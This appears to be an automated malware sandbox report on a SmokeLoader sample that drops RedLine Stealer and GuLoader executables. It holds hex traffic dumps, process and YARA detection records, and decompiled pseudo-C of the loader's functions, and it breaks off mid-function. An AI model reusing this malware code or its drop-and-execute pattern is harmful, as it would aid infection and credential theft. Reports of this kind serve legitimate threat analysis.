                                                                                                                                  2021-12-18 14:32:15 UTC535INData Raw: 32 65 37 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 61 73 74 69 6e 73 63 75 73 74 6f 6d 66 61 62 2e 63 6f 6d 2f 78 6d 6c
                                                                                                                                  Data Ascii: 2e78<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="http://gmpg.org/xfn/11"><link rel="pingback" href="https://www.bastinscustomfab.com/xml
                                                                                                                                  2021-12-18 14:32:15 UTC543INData Raw: 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 33 39 30 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 61 73 74 69 6e 73 63 75 73 74 6f 6d 66 61 62 2e 63 6f 6d 2f 63 6f 6e 76 65 79 6f 72 73 2f 22 3e 43 6f 6e 76 65 79 6f 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 33 39 31 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 33 39 31 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 61 73 74 69 6e 73 63 75 73 74 6f 6d 66 61 62 2e 63 6f 6d 2f 6c 69 67 68 74 2d 64 75 74 79 2d 65 6c
                                                                                                                                  Data Ascii: ject-page menu-item-390"><a href="https://www.bastinscustomfab.com/conveyors/">Conveyors</a></li><li id="menu-item-391" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-391"><a href="https://www.bastinscustomfab.com/light-duty-el
                                                                                                                                  2021-12-18 14:32:15 UTC547INData Raw: 0d 0a
                                                                                                                                  Data Ascii:
                                                                                                                                  2021-12-18 14:32:15 UTC547INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Code Manipulations

                                                                                                                                  Statistics

                                                                                                                                  CPU Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  Memory Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  High Level Behavior Distribution

                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                  Behavior

                                                                                                                                  Click to jump to process

                                                                                                                                  System Behavior

                                                                                                                                  General

                                                                                                                                  Start time:15:30:52
                                                                                                                                  Start date:18/12/2021
                                                                                                                                  Path:C:\Users\user\Desktop\fw8ex1BNek.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\fw8ex1BNek.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:307712 bytes
                                                                                                                                  MD5 hash:6A4B078A500C92AE7BBF3563A49FB100
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.427646956.00000000007C1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.427536379.0000000000680000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.360531074.0000000000640000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:low

                                                                                                                                  General

                                                                                                                                  Start time:15:31:04
                                                                                                                                  Start date:18/12/2021
                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                                  Imagebase:0x7ff6f22f0000
                                                                                                                                  File size:3933184 bytes
                                                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000000.405588327.0000000002E51000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Start time:15:31:42
                                                                                                                                  Start date:18/12/2021
                                                                                                                                  Path:C:\Users\user\AppData\Roaming\acgvitw
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\acgvitw
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:307712 bytes
                                                                                                                                  MD5 hash:6A4B078A500C92AE7BBF3563A49FB100
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.481080184.0000000000661000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000003.468340916.0000000000640000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.481062049.0000000000640000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  • Detection: 38%, ReversingLabs
                                                                                                                                  Reputation:low

                                                                                                                                  General

                                                                                                                                  Start time:15:32:02
                                                                                                                                  Start date:18/12/2021
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\DB56.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\DB56.exe
                                                                                                                                  Imagebase:0xaa0000
                                                                                                                                  File size:545280 bytes
                                                                                                                                  MD5 hash:F2F8A2B12CB2E41FFBE135B6ED9B5B7C
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000002.532354864.0000000003D61000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  • Detection: 60%, ReversingLabs
                                                                                                                                  Reputation:moderate

                                                                                                                                  General

                                                                                                                                  Start time:15:32:10
                                                                                                                                  Start date:18/12/2021
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\DB56.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\DB56.exe
                                                                                                                                  Imagebase:0xaa0000
                                                                                                                                  File size:545280 bytes
                                                                                                                                  MD5 hash:F2F8A2B12CB2E41FFBE135B6ED9B5B7C
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000012.00000002.617991454.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000012.00000000.523427669.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000012.00000000.522921861.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000012.00000000.524651517.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000012.00000000.524218924.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:moderate

                                                                                                                                  General

                                                                                                                                  Start time:15:32:29
                                                                                                                                  Start date:18/12/2021
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\4924.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\4924.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:406045 bytes
                                                                                                                                  MD5 hash:4C2D293F6A8F5AB1D869EFDFCD4AD41A
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000002.625266789.0000000002610000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000003.578493613.00000000006A4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000002.624238934.0000000002440000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:low

                                                                                                                                  General

                                                                                                                                  Start time:15:32:46
                                                                                                                                  Start date:18/12/2021
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\8CE5.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\8CE5.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:94424 bytes
                                                                                                                                  MD5 hash:EC1105BE312FD184FFC9D7F272D64B87
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000018.00000002.621930773.0000000002860000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:low

                                                                                                                                  Disassembly

                                                                                                                                  Code Analysis

                                                                                                                                  Reset < >

                                                                                                                                    Executed Functions

                                                                                                                                    C-Code - Quality: 36%
                                                                                                                                    			E00401824(char __eax, void* __ecx, void* __edi, void* __eflags) {
                                                                                                                                    				intOrPtr* _t8;
                                                                                                                                    				intOrPtr _t11;
                                                                                                                                    				intOrPtr _t13;
                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                    				void* _t19;
                                                                                                                                    				void* _t21;
                                                                                                                                    				void* _t22;
                                                                                                                                    				signed char* _t24;
                                                                                                                                    				void* _t26;
                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                    
                                                                                                                                    				_t22 = __edi;
                                                                                                                                    				_t19 = __ecx;
                                                                                                                                    				_t8 = __eax;
                                                                                                                                    				asm("aam 0xa6");
                                                                                                                                    				asm("outsb");
                                                                                                                                    				asm("xlatb");
                                                                                                                                    				 *0xd47b7c13 = __eax;
                                                                                                                                    				_pop(_t24);
                                                                                                                                    				asm("out dx, eax");
                                                                                                                                    				if(__eflags != 0) {
                                                                                                                                    					asm("arpl [eax], ax");
                                                                                                                                    					goto L6;
                                                                                                                                    				} else {
                                                                                                                                    					if(__eflags < 0) {
                                                                                                                                    						L6:
                                                                                                                                    						 *_t8 =  *_t8 + _t8;
                                                                                                                                    						__eflags =  *_t8;
                                                                                                                                    						goto L7;
                                                                                                                                    					} else {
                                                                                                                                    						if(__eflags < 0) {
                                                                                                                                    							L7:
                                                                                                                                    							L004011BF(_t8, _t22, _t24, _t26, __eflags);
                                                                                                                                    							_t17 =  *((intOrPtr*)(_t26 + 8));
                                                                                                                                    							Sleep(0x1388);
                                                                                                                                    							_t11 = E004013F1(_t17, _t21, _t22, _t24, _t17,  *((intOrPtr*)(_t26 + 0xc)),  *((intOrPtr*)(_t26 + 0x10)), _t26 - 4); // executed
                                                                                                                                    							__eflags = _t11;
                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                    								_push( *((intOrPtr*)(_t26 + 0x14)));
                                                                                                                                    								_push( *((intOrPtr*)(_t26 - 4)));
                                                                                                                                    								_push(_t11);
                                                                                                                                    								_push(_t17); // executed
                                                                                                                                    								E004014CF(_t11, _t17, _t19, _t21, _t22, _t24); // executed
                                                                                                                                    							}
                                                                                                                                    							 *_t17(0xffffffff, 0); // executed
                                                                                                                                    							_push(0x18bd);
                                                                                                                                    							_t13 =  *_t28;
                                                                                                                                    							return L004011BF(_t13, _t22, _t24, _t26, __eflags);
                                                                                                                                    						} else {
                                                                                                                                    							asm("aam 0x5e");
                                                                                                                                    							asm("fstp8 st4");
                                                                                                                                    							 *_t24 =  *_t24 << 0x43;
                                                                                                                                    							return 0x2b2b2bb3;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}













                                                                                                                                    0x00401824
                                                                                                                                    0x00401824
                                                                                                                                    0x00401824
                                                                                                                                    0x00401824
                                                                                                                                    0x00401826
                                                                                                                                    0x00401827
                                                                                                                                    0x00401828
                                                                                                                                    0x0040182d
                                                                                                                                    0x0040182e
                                                                                                                                    0x0040182f
                                                                                                                                    0x004018ad
                                                                                                                                    0x00000000
                                                                                                                                    0x00401831
                                                                                                                                    0x00401831
                                                                                                                                    0x004018af
                                                                                                                                    0x004018af
                                                                                                                                    0x004018af
                                                                                                                                    0x00000000
                                                                                                                                    0x00401833
                                                                                                                                    0x00401833
                                                                                                                                    0x004018b1
                                                                                                                                    0x004018b8
                                                                                                                                    0x004018bd
                                                                                                                                    0x004018c5
                                                                                                                                    0x004018d3
                                                                                                                                    0x004018d8
                                                                                                                                    0x004018da
                                                                                                                                    0x004018dc
                                                                                                                                    0x004018df
                                                                                                                                    0x004018e2
                                                                                                                                    0x004018e3
                                                                                                                                    0x004018e4
                                                                                                                                    0x004018e4
                                                                                                                                    0x004018ed
                                                                                                                                    0x004018f6
                                                                                                                                    0x004018fb
                                                                                                                                    0x00401924
                                                                                                                                    0x00401835
                                                                                                                                    0x00401835
                                                                                                                                    0x00401837
                                                                                                                                    0x0040183e
                                                                                                                                    0x00401841
                                                                                                                                    0x00401841
                                                                                                                                    0x00401833
                                                                                                                                    0x00401831

                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 004018C5
                                                                                                                                    • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018ED
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427049964.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProcessSleepTerminate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 417527130-0
                                                                                                                                    • Opcode ID: ad0f507ef67832261bf38ed725b204dfee6e0c30d2326636109802664b6aa668
                                                                                                                                    • Instruction ID: 42a07c3f6415b396ffd19e14411fed7baa37742ddc7d1671b3566718c03b9097
                                                                                                                                    • Opcode Fuzzy Hash: ad0f507ef67832261bf38ed725b204dfee6e0c30d2326636109802664b6aa668
                                                                                                                                    • Instruction Fuzzy Hash: EA01F533604245EBEB016BD48C91E993726AB41354F20467BB642B91F1DA3D8B12A36B
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 39%
                                                                                                                                    			E00401888(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                    				char _v8;
                                                                                                                                    				intOrPtr _v119;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				intOrPtr* _t10;
                                                                                                                                    				void* _t13;
                                                                                                                                    				intOrPtr _t15;
                                                                                                                                    				intOrPtr* _t19;
                                                                                                                                    				void* _t24;
                                                                                                                                    				void* _t26;
                                                                                                                                    				void* _t29;
                                                                                                                                    				void* _t31;
                                                                                                                                    				intOrPtr* _t32;
                                                                                                                                    				intOrPtr _t36;
                                                                                                                                    
                                                                                                                                    				_t23 = __edx;
                                                                                                                                    				_v119 = _v119 + __edx;
                                                                                                                                    				_t29 = _t31;
                                                                                                                                    				_t32 = _t31 - 4;
                                                                                                                                    				_push(_t26);
                                                                                                                                    				_push(_t24);
                                                                                                                                    				_t10 = 0x18bd;
                                                                                                                                    				asm("arpl [eax], ax");
                                                                                                                                    				 *_t10 =  *_t10 + _t10;
                                                                                                                                    				_t36 =  *_t10;
                                                                                                                                    				L004011BF(_t10, _t24, _t26, _t29, _t36);
                                                                                                                                    				_t19 = _a4;
                                                                                                                                    				Sleep(0x1388);
                                                                                                                                    				_t13 = E004013F1(_t19, _t23, _t24, _t26, _t19, _a8, _a12,  &_v8); // executed
                                                                                                                                    				_t37 = _t13;
                                                                                                                                    				if(_t13 != 0) {
                                                                                                                                    					_push(_a16);
                                                                                                                                    					_push(_v8);
                                                                                                                                    					_push(_t13);
                                                                                                                                    					_push(_t19); // executed
                                                                                                                                    					E004014CF(_t13, _t19, 0x63, _t23, _t24, _t26); // executed
                                                                                                                                    				}
                                                                                                                                    				 *_t19(0xffffffff, 0); // executed
                                                                                                                                    				_push(0x18bd);
                                                                                                                                    				_t15 =  *_t32;
                                                                                                                                    				return L004011BF(_t15, _t24, _t26, _t29, _t37);
                                                                                                                                    			}


















                                                                                                                                    0x00401888
                                                                                                                                    0x00401888
                                                                                                                                    0x0040188a
                                                                                                                                    0x0040188c
                                                                                                                                    0x00401890
                                                                                                                                    0x00401891
                                                                                                                                    0x0040189f
                                                                                                                                    0x004018ad
                                                                                                                                    0x004018af
                                                                                                                                    0x004018af
                                                                                                                                    0x004018b8
                                                                                                                                    0x004018bd
                                                                                                                                    0x004018c5
                                                                                                                                    0x004018d3
                                                                                                                                    0x004018d8
                                                                                                                                    0x004018da
                                                                                                                                    0x004018dc
                                                                                                                                    0x004018df
                                                                                                                                    0x004018e2
                                                                                                                                    0x004018e3
                                                                                                                                    0x004018e4
                                                                                                                                    0x004018e4
                                                                                                                                    0x004018ed
                                                                                                                                    0x004018f6
                                                                                                                                    0x004018fb
                                                                                                                                    0x00401924

                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 004018C5
                                                                                                                                    • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018ED
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427049964.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProcessSleepTerminate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 417527130-0
                                                                                                                                    • Opcode ID: 95b0f5ed6a0d16b85923b128117261f154bb39d95e5065dc622c728017946ed0
                                                                                                                                    • Instruction ID: 06ad8fc468d3cb0de258debb5d73388aacedaf873ec4a87ac4e9841071b9307a
                                                                                                                                    • Opcode Fuzzy Hash: 95b0f5ed6a0d16b85923b128117261f154bb39d95e5065dc622c728017946ed0
                                                                                                                                    • Instruction Fuzzy Hash: 0C01D476608208EBEB016A908CD0DA937269F45314F308237F613782F1C67D8713B76B
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 39%
                                                                                                                                    			E00401889(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                    				char _v8;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				void* __ebp;
                                                                                                                                    				intOrPtr* _t8;
                                                                                                                                    				void* _t11;
                                                                                                                                    				intOrPtr _t13;
                                                                                                                                    				intOrPtr* _t16;
                                                                                                                                    				void* _t19;
                                                                                                                                    				void* _t20;
                                                                                                                                    				void* _t21;
                                                                                                                                    				void* _t22;
                                                                                                                                    				intOrPtr* _t23;
                                                                                                                                    				intOrPtr _t25;
                                                                                                                                    
                                                                                                                                    				_t8 = 0x18bd;
                                                                                                                                    				asm("arpl [eax], ax");
                                                                                                                                    				 *_t8 =  *_t8 + _t8;
                                                                                                                                    				_t25 =  *_t8;
                                                                                                                                    				L004011BF(_t8, _t20, _t21, _t22, _t25);
                                                                                                                                    				_t16 = _a4;
                                                                                                                                    				Sleep(0x1388);
                                                                                                                                    				_t11 = E004013F1(_t16, _t19, _t20, _t21, _t16, _a8, _a12,  &_v8); // executed
                                                                                                                                    				_t26 = _t11;
                                                                                                                                    				if(_t11 != 0) {
                                                                                                                                    					_push(_a16);
                                                                                                                                    					_push(_v8);
                                                                                                                                    					_push(_t11);
                                                                                                                                    					_push(_t16); // executed
                                                                                                                                    					E004014CF(_t11, _t16, 0x63, _t19, _t20, _t21); // executed
                                                                                                                                    				}
                                                                                                                                    				 *_t16(0xffffffff, 0); // executed
                                                                                                                                    				_push(0x18bd);
                                                                                                                                    				_t13 =  *_t23;
                                                                                                                                    				return L004011BF(_t13, _t20, _t21, _t22, _t26);
                                                                                                                                    			}


















                                                                                                                                    0x0040189f
                                                                                                                                    0x004018ad
                                                                                                                                    0x004018af
                                                                                                                                    0x004018af
                                                                                                                                    0x004018b8
                                                                                                                                    0x004018bd
                                                                                                                                    0x004018c5
                                                                                                                                    0x004018d3
                                                                                                                                    0x004018d8
                                                                                                                                    0x004018da
                                                                                                                                    0x004018dc
                                                                                                                                    0x004018df
                                                                                                                                    0x004018e2
                                                                                                                                    0x004018e3
                                                                                                                                    0x004018e4
                                                                                                                                    0x004018e4
                                                                                                                                    0x004018ed
                                                                                                                                    0x004018f6
                                                                                                                                    0x004018fb
                                                                                                                                    0x00401924

                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 004018C5
                                                                                                                                    • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018ED
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427049964.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProcessSleepTerminate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 417527130-0
                                                                                                                                    • Opcode ID: 6d648cfe7043a349c0fb33ab0f60cd294c66010c56e2b7b12933d6fe6f57d3f1
                                                                                                                                    • Instruction ID: 8f35bf8a169b0738e0b1c43a95160d6084873621cdc7210903a112d1efbcbce3
                                                                                                                                    • Opcode Fuzzy Hash: 6d648cfe7043a349c0fb33ab0f60cd294c66010c56e2b7b12933d6fe6f57d3f1
                                                                                                                                    • Instruction Fuzzy Hash: 34018476608208FBEB017A958C91DAA36299F45314F208237BA13791F1D67D8B12B76B
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 45%
                                                                                                                                    			E004018A2(void* __edi, void* __esi) {
                                                                                                                                    				intOrPtr* _t8;
                                                                                                                                    				void* _t11;
                                                                                                                                    				intOrPtr _t13;
                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                    				void* _t21;
                                                                                                                                    				void* _t26;
                                                                                                                                    				void* _t28;
                                                                                                                                    				intOrPtr* _t29;
                                                                                                                                    				intOrPtr _t32;
                                                                                                                                    
                                                                                                                                    				_t24 = __esi;
                                                                                                                                    				_t22 = __edi;
                                                                                                                                    				_t29 = _t28 - 1;
                                                                                                                                    				_t8 = 0x18bd;
                                                                                                                                    				asm("arpl [eax], ax");
                                                                                                                                    				 *_t8 =  *_t8 + _t8;
                                                                                                                                    				_t32 =  *_t8;
                                                                                                                                    				L004011BF(_t8, __edi, __esi, _t26, _t32);
                                                                                                                                    				_t17 =  *((intOrPtr*)(_t26 + 8));
                                                                                                                                    				Sleep(0x1388);
                                                                                                                                    				_t11 = E004013F1(_t17, _t21, __edi, __esi, _t17,  *((intOrPtr*)(_t26 + 0xc)),  *((intOrPtr*)(_t26 + 0x10)), _t26 - 4); // executed
                                                                                                                                    				_t33 = _t11;
                                                                                                                                    				if(_t11 != 0) {
                                                                                                                                    					_push( *((intOrPtr*)(_t26 + 0x14)));
                                                                                                                                    					_push( *((intOrPtr*)(_t26 - 4)));
                                                                                                                                    					_push(_t11);
                                                                                                                                    					_push(_t17); // executed
                                                                                                                                    					E004014CF(_t11, _t17, 0x63, _t21, _t22, _t24); // executed
                                                                                                                                    				}
                                                                                                                                    				 *_t17(0xffffffff, 0); // executed
                                                                                                                                    				_push(0x18bd);
                                                                                                                                    				_t13 =  *_t29;
                                                                                                                                    				return L004011BF(_t13, _t22, _t24, _t26, _t33);
                                                                                                                                    			}












                                                                                                                                    0x004018a2
                                                                                                                                    0x004018a2
                                                                                                                                    0x004018a3
                                                                                                                                    0x0040189f
                                                                                                                                    0x004018ad
                                                                                                                                    0x004018af
                                                                                                                                    0x004018af
                                                                                                                                    0x004018b8
                                                                                                                                    0x004018bd
                                                                                                                                    0x004018c5
                                                                                                                                    0x004018d3
                                                                                                                                    0x004018d8
                                                                                                                                    0x004018da
                                                                                                                                    0x004018dc
                                                                                                                                    0x004018df
                                                                                                                                    0x004018e2
                                                                                                                                    0x004018e3
                                                                                                                                    0x004018e4
                                                                                                                                    0x004018e4
                                                                                                                                    0x004018ed
                                                                                                                                    0x004018f6
                                                                                                                                    0x004018fb
                                                                                                                                    0x00401924

                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 004018C5
                                                                                                                                    • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018ED
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.427049964.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProcessSleepTerminate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 417527130-0
                                                                                                                                    • Opcode ID: 2b4f686a24ac73ea9ddbf2007643a97ac3829562a52fb203e6efae52d12ca41b
                                                                                                                                    • Instruction ID: 4ab959d6f45887d16d6038ac862886a060d9e601cb6538da37887895e8bdb08d
                                                                                                                                    • Opcode Fuzzy Hash: 2b4f686a24ac73ea9ddbf2007643a97ac3829562a52fb203e6efae52d12ca41b
                                                                                                                                    • Instruction Fuzzy Hash: 0EF08677608204EBEB016AD19CD1E793216DB44314F308237B613791F1C63D8752B76B
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 43%
                                                                                                                                    			E004018A6(intOrPtr* __eax, signed int __ebx, void* __edi, void* __esi) {
                                                                                                                                    				void* _t11;
                                                                                                                                    				intOrPtr _t13;
                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                    				void* _t21;
                                                                                                                                    				signed int _t26;
                                                                                                                                    				signed int _t27;
                                                                                                                                    				intOrPtr* _t29;
                                                                                                                                    				intOrPtr _t33;
                                                                                                                                    
                                                                                                                                    				_t24 = __esi;
                                                                                                                                    				_t22 = __edi;
                                                                                                                                    				_t27 = _t26 & __ebx;
                                                                                                                                    				asm("arpl [eax], ax");
                                                                                                                                    				 *__eax =  *__eax + __eax;
                                                                                                                                    				_t33 =  *__eax;
                                                                                                                                    				L004011BF(__eax, __edi, __esi, _t27, _t33);
                                                                                                                                    				_t17 =  *((intOrPtr*)(_t27 + 8));
                                                                                                                                    				Sleep(0x1388);
                                                                                                                                    				_t11 = E004013F1(_t17, _t21, __edi, __esi, _t17,  *((intOrPtr*)(_t27 + 0xc)),  *((intOrPtr*)(_t27 + 0x10)), _t27 - 4); // executed
                                                                                                                                    				_t34 = _t11;
                                                                                                                                    				if(_t11 != 0) {
                                                                                                                                    					_push( *((intOrPtr*)(_t27 + 0x14)));
                                                                                                                                    					_push( *((intOrPtr*)(_t27 - 4)));
                                                                                                                                    					_push(_t11);
                                                                                                                                    					_push(_t17); // executed
